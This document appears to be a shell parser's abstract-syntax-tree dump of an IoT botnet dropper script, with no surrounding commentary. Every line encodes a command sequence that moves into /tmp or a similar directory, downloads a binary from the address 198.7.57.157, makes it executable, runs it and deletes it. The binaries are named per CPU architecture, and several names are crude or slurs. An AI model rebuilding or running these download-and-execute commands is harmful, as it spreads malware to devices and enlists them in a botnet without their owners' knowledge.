ListNode(lineno=2, pos=(12, 148), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 100), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 100), word='http://198.7.57.157/dankmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(100, 101)),
  CommandNode(lineno=2, pos=(102, 119), parts=[
    WordNode(lineno=2, pos=(102, 107), word='chmod'),
    WordNode(lineno=2, pos=(108, 110), word='+x'),
    WordNode(lineno=2, pos=(111, 119), word='dankmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(119, 120)),
  CommandNode(lineno=2, pos=(121, 131), parts=[
    WordNode(lineno=2, pos=(121, 131), word='./dankmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(131, 132)),
  CommandNode(lineno=2, pos=(133, 148), parts=[
    WordNode(lineno=2, pos=(133, 135), word='rm'),
    WordNode(lineno=2, pos=(136, 139), word='-rf'),
    WordNode(lineno=2, pos=(140, 148), word='dankmips'),
  ]),
])
ListNode(lineno=3, pos=(149, 293), parts=[
  CommandNode(lineno=3, pos=(149, 156), parts=[
    WordNode(lineno=3, pos=(149, 151), word='cd'),
    WordNode(lineno=3, pos=(152, 156), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 171), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 171), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(172, 174)),
  CommandNode(lineno=3, pos=(175, 182), parts=[
    WordNode(lineno=3, pos=(175, 177), word='cd'),
    WordNode(lineno=3, pos=(178, 182), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(183, 185)),
  CommandNode(lineno=3, pos=(186, 194), parts=[
    WordNode(lineno=3, pos=(186, 188), word='cd'),
    WordNode(lineno=3, pos=(189, 194), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(195, 197)),
  CommandNode(lineno=3, pos=(198, 202), parts=[
    WordNode(lineno=3, pos=(198, 200), word='cd'),
    WordNode(lineno=3, pos=(201, 202), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(202, 203)),
  CommandNode(lineno=3, pos=(204, 239), parts=[
    WordNode(lineno=3, pos=(204, 208), word='wget'),
    WordNode(lineno=3, pos=(209, 239), word='http://198.7.57.157/dankmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(239, 240)),
  CommandNode(lineno=3, pos=(241, 260), parts=[
    WordNode(lineno=3, pos=(241, 246), word='chmod'),
    WordNode(lineno=3, pos=(247, 249), word='+x'),
    WordNode(lineno=3, pos=(250, 260), word='dankmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(260, 261)),
  CommandNode(lineno=3, pos=(262, 274), parts=[
    WordNode(lineno=3, pos=(262, 274), word='./dankmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(274, 275)),
  CommandNode(lineno=3, pos=(276, 293), parts=[
    WordNode(lineno=3, pos=(276, 278), word='rm'),
    WordNode(lineno=3, pos=(279, 282), word='-rf'),
    WordNode(lineno=3, pos=(283, 293), word='dankmipsel'),
  ]),
])
ListNode(lineno=4, pos=(294, 426), parts=[
  CommandNode(lineno=4, pos=(294, 301), parts=[
    WordNode(lineno=4, pos=(294, 296), word='cd'),
    WordNode(lineno=4, pos=(297, 301), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(302, 304)),
  CommandNode(lineno=4, pos=(305, 316), parts=[
    WordNode(lineno=4, pos=(305, 307), word='cd'),
    WordNode(lineno=4, pos=(308, 316), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(317, 319)),
  CommandNode(lineno=4, pos=(320, 327), parts=[
    WordNode(lineno=4, pos=(320, 322), word='cd'),
    WordNode(lineno=4, pos=(323, 327), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(328, 330)),
  CommandNode(lineno=4, pos=(331, 339), parts=[
    WordNode(lineno=4, pos=(331, 333), word='cd'),
    WordNode(lineno=4, pos=(334, 339), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(340, 342)),
  CommandNode(lineno=4, pos=(343, 347), parts=[
    WordNode(lineno=4, pos=(343, 345), word='cd'),
    WordNode(lineno=4, pos=(346, 347), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 381), parts=[
    WordNode(lineno=4, pos=(349, 353), word='wget'),
    WordNode(lineno=4, pos=(354, 381), word='http://198.7.57.157/danksh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(381, 382)),
  CommandNode(lineno=4, pos=(383, 399), parts=[
    WordNode(lineno=4, pos=(383, 388), word='chmod'),
    WordNode(lineno=4, pos=(389, 391), word='+x'),
    WordNode(lineno=4, pos=(392, 399), word='danksh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(399, 400)),
  CommandNode(lineno=4, pos=(401, 410), parts=[
    WordNode(lineno=4, pos=(401, 410), word='./danksh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(410, 411)),
  CommandNode(lineno=4, pos=(412, 426), parts=[
    WordNode(lineno=4, pos=(412, 414), word='rm'),
    WordNode(lineno=4, pos=(415, 418), word='-rf'),
    WordNode(lineno=4, pos=(419, 426), word='danksh4'),
  ]),
])
ListNode(lineno=5, pos=(427, 571), parts=[
  CommandNode(lineno=5, pos=(427, 434), parts=[
    WordNode(lineno=5, pos=(427, 429), word='cd'),
    WordNode(lineno=5, pos=(430, 434), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(435, 437)),
  CommandNode(lineno=5, pos=(438, 449), parts=[
    WordNode(lineno=5, pos=(438, 440), word='cd'),
    WordNode(lineno=5, pos=(441, 449), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(450, 452)),
  CommandNode(lineno=5, pos=(453, 460), parts=[
    WordNode(lineno=5, pos=(453, 455), word='cd'),
    WordNode(lineno=5, pos=(456, 460), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(461, 463)),
  CommandNode(lineno=5, pos=(464, 472), parts=[
    WordNode(lineno=5, pos=(464, 466), word='cd'),
    WordNode(lineno=5, pos=(467, 472), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(473, 475)),
  CommandNode(lineno=5, pos=(476, 480), parts=[
    WordNode(lineno=5, pos=(476, 478), word='cd'),
    WordNode(lineno=5, pos=(479, 480), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(480, 481)),
  CommandNode(lineno=5, pos=(482, 517), parts=[
    WordNode(lineno=5, pos=(482, 486), word='wget'),
    WordNode(lineno=5, pos=(487, 517), word='http://198.7.57.157/fukwindowz'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(517, 518)),
  CommandNode(lineno=5, pos=(519, 538), parts=[
    WordNode(lineno=5, pos=(519, 524), word='chmod'),
    WordNode(lineno=5, pos=(525, 527), word='+x'),
    WordNode(lineno=5, pos=(528, 538), word='fukwindowz'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(538, 539)),
  CommandNode(lineno=5, pos=(540, 552), parts=[
    WordNode(lineno=5, pos=(540, 552), word='./fukwindowz'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(552, 553)),
  CommandNode(lineno=5, pos=(554, 571), parts=[
    WordNode(lineno=5, pos=(554, 556), word='rm'),
    WordNode(lineno=5, pos=(557, 560), word='-rf'),
    WordNode(lineno=5, pos=(561, 571), word='fukwindowz'),
  ]),
])
ListNode(lineno=6, pos=(572, 708), parts=[
  CommandNode(lineno=6, pos=(572, 579), parts=[
    WordNode(lineno=6, pos=(572, 574), word='cd'),
    WordNode(lineno=6, pos=(575, 579), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(580, 582)),
  CommandNode(lineno=6, pos=(583, 594), parts=[
    WordNode(lineno=6, pos=(583, 585), word='cd'),
    WordNode(lineno=6, pos=(586, 594), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(595, 597)),
  CommandNode(lineno=6, pos=(598, 605), parts=[
    WordNode(lineno=6, pos=(598, 600), word='cd'),
    WordNode(lineno=6, pos=(601, 605), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(606, 608)),
  CommandNode(lineno=6, pos=(609, 617), parts=[
    WordNode(lineno=6, pos=(609, 611), word='cd'),
    WordNode(lineno=6, pos=(612, 617), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(618, 620)),
  CommandNode(lineno=6, pos=(621, 625), parts=[
    WordNode(lineno=6, pos=(621, 623), word='cd'),
    WordNode(lineno=6, pos=(624, 625), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(625, 626)),
  CommandNode(lineno=6, pos=(627, 660), parts=[
    WordNode(lineno=6, pos=(627, 631), word='wget'),
    WordNode(lineno=6, pos=(632, 660), word='http://198.7.57.157/dankarms'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(660, 661)),
  CommandNode(lineno=6, pos=(662, 679), parts=[
    WordNode(lineno=6, pos=(662, 667), word='chmod'),
    WordNode(lineno=6, pos=(668, 670), word='+x'),
    WordNode(lineno=6, pos=(671, 679), word='dankarms'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(679, 680)),
  CommandNode(lineno=6, pos=(681, 691), parts=[
    WordNode(lineno=6, pos=(681, 691), word='./dankarms'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(691, 692)),
  CommandNode(lineno=6, pos=(693, 708), parts=[
    WordNode(lineno=6, pos=(693, 695), word='rm'),
    WordNode(lineno=6, pos=(696, 699), word='-rf'),
    WordNode(lineno=6, pos=(700, 708), word='dankarms'),
  ]),
])
ListNode(lineno=7, pos=(709, 849), parts=[
  CommandNode(lineno=7, pos=(709, 716), parts=[
    WordNode(lineno=7, pos=(709, 711), word='cd'),
    WordNode(lineno=7, pos=(712, 716), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(717, 719)),
  CommandNode(lineno=7, pos=(720, 731), parts=[
    WordNode(lineno=7, pos=(720, 722), word='cd'),
    WordNode(lineno=7, pos=(723, 731), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(732, 734)),
  CommandNode(lineno=7, pos=(735, 742), parts=[
    WordNode(lineno=7, pos=(735, 737), word='cd'),
    WordNode(lineno=7, pos=(738, 742), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(743, 745)),
  CommandNode(lineno=7, pos=(746, 754), parts=[
    WordNode(lineno=7, pos=(746, 748), word='cd'),
    WordNode(lineno=7, pos=(749, 754), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(755, 757)),
  CommandNode(lineno=7, pos=(758, 762), parts=[
    WordNode(lineno=7, pos=(758, 760), word='cd'),
    WordNode(lineno=7, pos=(761, 762), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(762, 763)),
  CommandNode(lineno=7, pos=(764, 798), parts=[
    WordNode(lineno=7, pos=(764, 768), word='wget'),
    WordNode(lineno=7, pos=(769, 798), word='http://198.7.57.157/wgetisgay'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(798, 799)),
  CommandNode(lineno=7, pos=(800, 818), parts=[
    WordNode(lineno=7, pos=(800, 805), word='chmod'),
    WordNode(lineno=7, pos=(806, 808), word='+x'),
    WordNode(lineno=7, pos=(809, 818), word='wgetisgay'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(818, 819)),
  CommandNode(lineno=7, pos=(820, 831), parts=[
    WordNode(lineno=7, pos=(820, 831), word='./wgetisgay'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(831, 832)),
  CommandNode(lineno=7, pos=(833, 849), parts=[
    WordNode(lineno=7, pos=(833, 835), word='rm'),
    WordNode(lineno=7, pos=(836, 839), word='-rf'),
    WordNode(lineno=7, pos=(840, 849), word='wgetisgay'),
  ]),
])
ListNode(lineno=8, pos=(850, 986), parts=[
  CommandNode(lineno=8, pos=(850, 857), parts=[
    WordNode(lineno=8, pos=(850, 852), word='cd'),
    WordNode(lineno=8, pos=(853, 857), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(858, 860)),
  CommandNode(lineno=8, pos=(861, 872), parts=[
    WordNode(lineno=8, pos=(861, 863), word='cd'),
    WordNode(lineno=8, pos=(864, 872), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(873, 875)),
  CommandNode(lineno=8, pos=(876, 883), parts=[
    WordNode(lineno=8, pos=(876, 878), word='cd'),
    WordNode(lineno=8, pos=(879, 883), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(884, 886)),
  CommandNode(lineno=8, pos=(887, 895), parts=[
    WordNode(lineno=8, pos=(887, 889), word='cd'),
    WordNode(lineno=8, pos=(890, 895), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(896, 898)),
  CommandNode(lineno=8, pos=(899, 903), parts=[
    WordNode(lineno=8, pos=(899, 901), word='cd'),
    WordNode(lineno=8, pos=(902, 903), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(903, 904)),
  CommandNode(lineno=8, pos=(905, 938), parts=[
    WordNode(lineno=8, pos=(905, 909), word='wget'),
    WordNode(lineno=8, pos=(910, 938), word='http://198.7.57.157/ppcbitch'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(938, 939)),
  CommandNode(lineno=8, pos=(940, 957), parts=[
    WordNode(lineno=8, pos=(940, 945), word='chmod'),
    WordNode(lineno=8, pos=(946, 948), word='+x'),
    WordNode(lineno=8, pos=(949, 957), word='ppcbitch'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(957, 958)),
  CommandNode(lineno=8, pos=(959, 969), parts=[
    WordNode(lineno=8, pos=(959, 969), word='./ppcbitch'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(969, 970)),
  CommandNode(lineno=8, pos=(971, 986), parts=[
    WordNode(lineno=8, pos=(971, 973), word='rm'),
    WordNode(lineno=8, pos=(974, 977), word='-rf'),
    WordNode(lineno=8, pos=(978, 986), word='ppcbitch'),
  ]),
])
ListNode(lineno=9, pos=(987, 1131), parts=[
  CommandNode(lineno=9, pos=(987, 994), parts=[
    WordNode(lineno=9, pos=(987, 989), word='cd'),
    WordNode(lineno=9, pos=(990, 994), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(995, 997)),
  CommandNode(lineno=9, pos=(998, 1009), parts=[
    WordNode(lineno=9, pos=(998, 1000), word='cd'),
    WordNode(lineno=9, pos=(1001, 1009), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1010, 1012)),
  CommandNode(lineno=9, pos=(1013, 1020), parts=[
    WordNode(lineno=9, pos=(1013, 1015), word='cd'),
    WordNode(lineno=9, pos=(1016, 1020), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1021, 1023)),
  CommandNode(lineno=9, pos=(1024, 1032), parts=[
    WordNode(lineno=9, pos=(1024, 1026), word='cd'),
    WordNode(lineno=9, pos=(1027, 1032), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1033, 1035)),
  CommandNode(lineno=9, pos=(1036, 1040), parts=[
    WordNode(lineno=9, pos=(1036, 1038), word='cd'),
    WordNode(lineno=9, pos=(1039, 1040), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1040, 1041)),
  CommandNode(lineno=9, pos=(1042, 1077), parts=[
    WordNode(lineno=9, pos=(1042, 1046), word='wget'),
    WordNode(lineno=9, pos=(1047, 1077), word='http://198.7.57.157/fukthepigs'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1077, 1078)),
  CommandNode(lineno=9, pos=(1079, 1098), parts=[
    WordNode(lineno=9, pos=(1079, 1084), word='chmod'),
    WordNode(lineno=9, pos=(1085, 1087), word='+x'),
    WordNode(lineno=9, pos=(1088, 1098), word='fukthepigs'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1098, 1099)),
  CommandNode(lineno=9, pos=(1100, 1112), parts=[
    WordNode(lineno=9, pos=(1100, 1112), word='./fukthepigs'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1112, 1113)),
  CommandNode(lineno=9, pos=(1114, 1131), parts=[
    WordNode(lineno=9, pos=(1114, 1116), word='rm'),
    WordNode(lineno=9, pos=(1117, 1120), word='-rf'),
    WordNode(lineno=9, pos=(1121, 1131), word='fukthepigs'),
  ]),
])
ListNode(lineno=10, pos=(1132, 1296), parts=[
  CommandNode(lineno=10, pos=(1132, 1139), parts=[
    WordNode(lineno=10, pos=(1132, 1134), word='cd'),
    WordNode(lineno=10, pos=(1135, 1139), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1140, 1142)),
  CommandNode(lineno=10, pos=(1143, 1154), parts=[
    WordNode(lineno=10, pos=(1143, 1145), word='cd'),
    WordNode(lineno=10, pos=(1146, 1154), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1155, 1157)),
  CommandNode(lineno=10, pos=(1158, 1165), parts=[
    WordNode(lineno=10, pos=(1158, 1160), word='cd'),
    WordNode(lineno=10, pos=(1161, 1165), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1166, 1168)),
  CommandNode(lineno=10, pos=(1169, 1177), parts=[
    WordNode(lineno=10, pos=(1169, 1171), word='cd'),
    WordNode(lineno=10, pos=(1172, 1177), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1178, 1180)),
  CommandNode(lineno=10, pos=(1181, 1185), parts=[
    WordNode(lineno=10, pos=(1181, 1183), word='cd'),
    WordNode(lineno=10, pos=(1184, 1185), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1185, 1186)),
  CommandNode(lineno=10, pos=(1187, 1227), parts=[
    WordNode(lineno=10, pos=(1187, 1191), word='wget'),
    WordNode(lineno=10, pos=(1192, 1227), word='http://198.7.57.157/pigsfucktwopigs'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1227, 1228)),
  CommandNode(lineno=10, pos=(1229, 1253), parts=[
    WordNode(lineno=10, pos=(1229, 1234), word='chmod'),
    WordNode(lineno=10, pos=(1235, 1237), word='+x'),
    WordNode(lineno=10, pos=(1238, 1253), word='pigsfucktwopigs'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1253, 1254)),
  CommandNode(lineno=10, pos=(1255, 1272), parts=[
    WordNode(lineno=10, pos=(1255, 1272), word='./pigsfucktwopigs'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1272, 1273)),
  CommandNode(lineno=10, pos=(1274, 1296), parts=[
    WordNode(lineno=10, pos=(1274, 1276), word='rm'),
    WordNode(lineno=10, pos=(1277, 1280), word='-rf'),
    WordNode(lineno=10, pos=(1281, 1296), word='pigsfucktwopigs'),
  ]),
])
ListNode(lineno=11, pos=(1297, 1421), parts=[
  CommandNode(lineno=11, pos=(1297, 1304), parts=[
    WordNode(lineno=11, pos=(1297, 1299), word='cd'),
    WordNode(lineno=11, pos=(1300, 1304), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1305, 1307)),
  CommandNode(lineno=11, pos=(1308, 1319), parts=[
    WordNode(lineno=11, pos=(1308, 1310), word='cd'),
    WordNode(lineno=11, pos=(1311, 1319), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1320, 1322)),
  CommandNode(lineno=11, pos=(1323, 1330), parts=[
    WordNode(lineno=11, pos=(1323, 1325), word='cd'),
    WordNode(lineno=11, pos=(1326, 1330), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1331, 1333)),
  CommandNode(lineno=11, pos=(1334, 1342), parts=[
    WordNode(lineno=11, pos=(1334, 1336), word='cd'),
    WordNode(lineno=11, pos=(1337, 1342), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1343, 1345)),
  CommandNode(lineno=11, pos=(1346, 1350), parts=[
    WordNode(lineno=11, pos=(1346, 1348), word='cd'),
    WordNode(lineno=11, pos=(1349, 1350), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1350, 1351)),
  CommandNode(lineno=11, pos=(1352, 1382), parts=[
    WordNode(lineno=11, pos=(1352, 1356), word='wget'),
    WordNode(lineno=11, pos=(1357, 1382), word='http://198.7.57.157/south'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1382, 1383)),
  CommandNode(lineno=11, pos=(1384, 1398), parts=[
    WordNode(lineno=11, pos=(1384, 1389), word='chmod'),
    WordNode(lineno=11, pos=(1390, 1392), word='+x'),
    WordNode(lineno=11, pos=(1393, 1398), word='south'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1398, 1399)),
  CommandNode(lineno=11, pos=(1400, 1407), parts=[
    WordNode(lineno=11, pos=(1400, 1407), word='./south'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1407, 1408)),
  CommandNode(lineno=11, pos=(1409, 1421), parts=[
    WordNode(lineno=11, pos=(1409, 1411), word='rm'),
    WordNode(lineno=11, pos=(1412, 1415), word='-rf'),
    WordNode(lineno=11, pos=(1416, 1421), word='south'),
  ]),
])
ListNode(lineno=12, pos=(1422, 1538), parts=[
  CommandNode(lineno=12, pos=(1422, 1429), parts=[
    WordNode(lineno=12, pos=(1422, 1424), word='cd'),
    WordNode(lineno=12, pos=(1425, 1429), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1430, 1432)),
  CommandNode(lineno=12, pos=(1433, 1444), parts=[
    WordNode(lineno=12, pos=(1433, 1435), word='cd'),
    WordNode(lineno=12, pos=(1436, 1444), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1445, 1447)),
  CommandNode(lineno=12, pos=(1448, 1455), parts=[
    WordNode(lineno=12, pos=(1448, 1450), word='cd'),
    WordNode(lineno=12, pos=(1451, 1455), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1456, 1458)),
  CommandNode(lineno=12, pos=(1459, 1467), parts=[
    WordNode(lineno=12, pos=(1459, 1461), word='cd'),
    WordNode(lineno=12, pos=(1462, 1467), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1468, 1470)),
  CommandNode(lineno=12, pos=(1471, 1475), parts=[
    WordNode(lineno=12, pos=(1471, 1473), word='cd'),
    WordNode(lineno=12, pos=(1474, 1475), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1475, 1476)),
  CommandNode(lineno=12, pos=(1477, 1505), parts=[
    WordNode(lineno=12, pos=(1477, 1481), word='wget'),
    WordNode(lineno=12, pos=(1482, 1505), word='http://198.7.57.157/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1505, 1506)),
  CommandNode(lineno=12, pos=(1507, 1519), parts=[
    WordNode(lineno=12, pos=(1507, 1512), word='chmod'),
    WordNode(lineno=12, pos=(1513, 1515), word='+x'),
    WordNode(lineno=12, pos=(1516, 1519), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1519, 1520)),
  CommandNode(lineno=12, pos=(1521, 1526), parts=[
    WordNode(lineno=12, pos=(1521, 1526), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1526, 1527)),
  CommandNode(lineno=12, pos=(1528, 1538), parts=[
    WordNode(lineno=12, pos=(1528, 1530), word='rm'),
    WordNode(lineno=12, pos=(1531, 1534), word='-rf'),
    WordNode(lineno=12, pos=(1535, 1538), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1539, 1671), parts=[
  CommandNode(lineno=13, pos=(1539, 1546), parts=[
    WordNode(lineno=13, pos=(1539, 1541), word='cd'),
    WordNode(lineno=13, pos=(1542, 1546), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1547, 1549)),
  CommandNode(lineno=13, pos=(1550, 1561), parts=[
    WordNode(lineno=13, pos=(1550, 1552), word='cd'),
    WordNode(lineno=13, pos=(1553, 1561), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1562, 1564)),
  CommandNode(lineno=13, pos=(1565, 1572), parts=[
    WordNode(lineno=13, pos=(1565, 1567), word='cd'),
    WordNode(lineno=13, pos=(1568, 1572), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1573, 1575)),
  CommandNode(lineno=13, pos=(1576, 1584), parts=[
    WordNode(lineno=13, pos=(1576, 1578), word='cd'),
    WordNode(lineno=13, pos=(1579, 1584), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1585, 1587)),
  CommandNode(lineno=13, pos=(1588, 1592), parts=[
    WordNode(lineno=13, pos=(1588, 1590), word='cd'),
    WordNode(lineno=13, pos=(1591, 1592), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1592, 1593)),
  CommandNode(lineno=13, pos=(1594, 1626), parts=[
    WordNode(lineno=13, pos=(1594, 1598), word='wget'),
    WordNode(lineno=13, pos=(1599, 1626), word='http://198.7.57.157/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1626, 1627)),
  CommandNode(lineno=13, pos=(1628, 1644), parts=[
    WordNode(lineno=13, pos=(1628, 1633), word='chmod'),
    WordNode(lineno=13, pos=(1634, 1636), word='+x'),
    WordNode(lineno=13, pos=(1637, 1644), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1644, 1645)),
  CommandNode(lineno=13, pos=(1646, 1655), parts=[
    WordNode(lineno=13, pos=(1646, 1655), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1655, 1656)),
  CommandNode(lineno=13, pos=(1657, 1671), parts=[
    WordNode(lineno=13, pos=(1657, 1659), word='rm'),
    WordNode(lineno=13, pos=(1660, 1663), word='-rf'),
    WordNode(lineno=13, pos=(1664, 1671), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1672, 1804), parts=[
  CommandNode(lineno=14, pos=(1672, 1679), parts=[
    WordNode(lineno=14, pos=(1672, 1674), word='cd'),
    WordNode(lineno=14, pos=(1675, 1679), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1680, 1682)),
  CommandNode(lineno=14, pos=(1683, 1694), parts=[
    WordNode(lineno=14, pos=(1683, 1685), word='cd'),
    WordNode(lineno=14, pos=(1686, 1694), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1695, 1697)),
  CommandNode(lineno=14, pos=(1698, 1705), parts=[
    WordNode(lineno=14, pos=(1698, 1700), word='cd'),
    WordNode(lineno=14, pos=(1701, 1705), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1706, 1708)),
  CommandNode(lineno=14, pos=(1709, 1717), parts=[
    WordNode(lineno=14, pos=(1709, 1711), word='cd'),
    WordNode(lineno=14, pos=(1712, 1717), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1718, 1720)),
  CommandNode(lineno=14, pos=(1721, 1725), parts=[
    WordNode(lineno=14, pos=(1721, 1723), word='cd'),
    WordNode(lineno=14, pos=(1724, 1725), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1725, 1726)),
  CommandNode(lineno=14, pos=(1727, 1759), parts=[
    WordNode(lineno=14, pos=(1727, 1731), word='wget'),
    WordNode(lineno=14, pos=(1732, 1759), word='http://198.7.57.157/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1759, 1760)),
  CommandNode(lineno=14, pos=(1761, 1777), parts=[
    WordNode(lineno=14, pos=(1761, 1766), word='chmod'),
    WordNode(lineno=14, pos=(1767, 1769), word='+x'),
    WordNode(lineno=14, pos=(1770, 1777), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1777, 1778)),
  CommandNode(lineno=14, pos=(1779, 1788), parts=[
    WordNode(lineno=14, pos=(1779, 1788), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1788, 1789)),
  CommandNode(lineno=14, pos=(1790, 1804), parts=[
    WordNode(lineno=14, pos=(1790, 1792), word='rm'),
    WordNode(lineno=14, pos=(1793, 1796), word='-rf'),
    WordNode(lineno=14, pos=(1797, 1804), word='telnetd'),
  ]),
])
